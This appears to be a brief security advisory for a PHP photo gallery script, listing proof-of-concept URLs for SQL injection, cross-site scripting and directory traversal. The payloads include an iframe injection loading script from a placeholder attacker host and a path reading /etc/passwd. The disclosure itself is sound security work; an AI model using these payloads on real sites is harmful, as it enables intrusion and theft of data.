Homepage: http://www.particlesoft.net/particlegallery/

Affected files:
viewimage.php
viewalbum.php

SQL Injection:
http://www.example.com/viewimage.php?imageid='

XSS Vulnerability proof of concept:
http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsite.com/scriptlet.html>

Possible Directory Traversal?:
http://www.example.com/viewalbum.php?albumid=../../../../etc/passwd/